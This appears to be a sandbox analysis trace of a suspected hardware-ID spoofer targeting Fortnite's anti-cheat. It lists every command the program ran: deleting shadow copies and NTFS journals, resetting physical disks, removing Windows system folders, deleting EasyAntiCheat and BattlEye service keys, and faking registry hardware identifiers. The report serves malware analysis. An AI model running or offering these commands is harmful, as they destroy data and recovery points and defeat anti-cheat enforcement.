- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:2392
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d 24277159744554 /f
      4⤵
      PID:4140
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:6032
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d 24277159744554125503073287028078290722120220352049725798 /f
      4⤵
      PID:2748
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:5628
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5380
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {24277-15974-455412550} /f
      4⤵
      Modifies registry key
      PID:5684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\IME\Cleaner.exe
    3⤵
    PID:4180
  - - C:\Windows\IME\Cleaner.exe
      C:\Windows\IME\Cleaner.exe
      4⤵
      Drops startup file
      Executes dropped EXE
      Drops desktop.ini file(s)
      Drops file in System32 directory
      Enumerates system info in registry
      Modifies Internet Explorer settings
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      PID:4884
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /d C:
        5⤵
        
        PID:3156
      - C:\Windows\system32\fsutil.exe
        
        fsutil usn deletejournal /d C:
        6⤵
        Deletes NTFS Change Journal
        
        PID:2672
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /d D:
        5⤵
        
        PID:5928
      - C:\Windows\system32\fsutil.exe
        
        fsutil usn deletejournal /d D:
        6⤵
        Deletes NTFS Change Journal
        Enumerates connected drives
        
        PID:5420
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /d E:
        5⤵
        
        PID:5832
      - C:\Windows\system32\fsutil.exe
        
        fsutil usn deletejournal /d E:
        6⤵
        Deletes NTFS Change Journal
        Enumerates connected drives
        
        PID:5436
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c vssadmin delete shadows /All /Quiet
        5⤵
        
        PID:5716
      - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /All /Quiet
        6⤵
        Interacts with shadow copies
        
        PID:5632
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net stop winmgmt /Y
        5⤵
        
        PID:5400
      - C:\Windows\system32\net.exe
        
        net stop winmgmt /Y
        6⤵
        
        PID:5892
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop winmgmt /Y
        7⤵
        
        PID:5076
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache
    3⤵
    PID:3992
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6028
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    3⤵
    PID:4832
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\ConnectedDevicesPlatform\L.%username%\ActivitiesCache.db-wal
    3⤵
    PID:1660
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs\User
    3⤵
    PID:5604
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:5452
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\LocalService\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp
    3⤵
    PID:5724
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\cache\qtshadercache
    3⤵
    PID:3924
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\UsrClass.dat.log2
    3⤵
    PID:5728
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:5412
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\VkCache
    3⤵
    PID:6064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\IME\mac.exe
    3⤵
    PID:3676
  - - C:\Windows\IME\mac.exe
      C:\Windows\IME\mac.exe
      4⤵
      Executes dropped EXE
      PID:3208
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\CN\NewsFeed
    3⤵
    PID:3992
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE\RHKRUA8J
    3⤵
    PID:1452
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0\UsageLogs
    3⤵
    PID:3464
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Temp
    3⤵
    PID:2984
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp
    3⤵
    PID:724
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rd /q /s C:\$Recycle.Bin >nul 2>&1
    3⤵
    PID:5160
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\servicing\InboxFodMetadataCache
    3⤵
    PID:2576
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:2680
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5796
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:2288
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete
    3⤵
    PID:3992
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    PID:5308
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:1060
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:5516
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:1148
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5488
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:5076
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:656
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Logs
    3⤵
    PID:3544
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:6104
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:5016
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:2204
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:5432
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:5340
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs
    3⤵
    PID:400
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h /a:a /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:1588
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:4940
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4884
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:3152
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:5632
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:1668
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:5876
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:4784
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:3232
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5320
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:5852
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1280
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir / s / q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:3392
- C:\Users\Admin\AppData\Local\Temp\nExOs.exe
  "C:\Users\Admin\AppData\Local\Temp\nExOs.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4780
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:3704
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FortniteClient-Win64-Shipping.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe >nul 2>&1
    3⤵
    PID:1900
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OneDrive.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c color b
    3⤵
    PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c color 4
    3⤵
    PID:4024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Reset-PhysicalDisk * >nul 2>&1
    3⤵
    PID:1028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Reset-PhysicalDisk *
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
    3⤵
    PID:5412
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
      4⤵
      PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:5608
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
      4⤵
      PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:5340
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
      4⤵
      PID:5556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
    3⤵
    PID:5884
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
      4⤵
      PID:5572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5564
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d 24224784013639207532953811410238141697620078221002286425094 /f
      4⤵
      Modifies registry key
      PID:5812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    PID:5820
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
      4⤵
      Checks processor information in registry
      PID:5860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5140
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 24224784013639207532953811410238141697620078221002286425094 /f
      4⤵
      Modifies registry key
      PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:5964
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-24224 /f
      4⤵
      PID:5960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:5976
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-24228 /f
      4⤵
      PID:6028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Paste%random%-%random%-%random%-%random% /f
    3⤵
    PID:6080
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Paste24228-18588-31503-12048 /f
      4⤵
      PID:6100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Paste-%random%-%random} /f
    3⤵
    PID:5156
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Paste-24228-%random} /f
      4⤵
      PID:4488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Paste-%random%%random%%random% /f
    3⤵
    PID:2228
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Paste-242281858831503 /f
      4⤵
      PID:5124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Paste-%random% /f
    3⤵
    PID:1364
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Paste-24228 /f
      4⤵
      PID:1716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Paste-%random% /f
    3⤵
    PID:5392
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Paste-24228 /f
      4⤵
      PID:5372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Paste-%random%%random%%random% /f
    3⤵
    PID:5252
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Paste-242281858831503 /f
      4⤵
      Enumerates system info in registry
      PID:5212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:5232
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Paste-24228-18588-3150312048} /f
      4⤵
      PID:684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:4880
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Paste-24228-18588-3150312048} /f
      4⤵
      Modifies registry key
      PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:4416
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Paste-24228-18588-3150312048} /f
      4⤵
      PID:5408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:3964
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Paste-24228-18588-3150312048 /f
      4⤵
      PID:5364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:5356
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Paste-24228-18588-3150312048 /f
      4⤵
      PID:5596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:5612
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Paste-24228-18588-3150312048 /f
      4⤵
      PID:5708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:5604
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Paste-24228-18588-3150312048 /f
      4⤵
      PID:5644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:5580
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Paste-24228-18588-3150312048 /f
      4⤵
      PID:5884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:5800
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Paste-24228-18588-3150312048 /f
      4⤵
      Enumerates system info in registry
      PID:5840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:5828
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Paste-24228-18588-3150312048 /f
      4⤵
      Enumerates system info in registry
      PID:5896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:5824
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Paste-24228-18588-3150312048} /f
      4⤵
      PID:5796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:5844
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Paste-24228-18588-3150312048} /f
      4⤵
      PID:5160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:6028
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-24228 /f
      4⤵
      PID:5976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f
    3⤵
    PID:6008
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 24228 /f
      4⤵
      PID:5984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f
    3⤵
    PID:6072
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 24228 /f
      4⤵
      PID:5148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:1380
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-24228 /f
      4⤵
      PID:832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Paste%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:5436
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Paste24228-18588-31503-120487085} /f
      4⤵
      PID:5228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Paste%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:4992
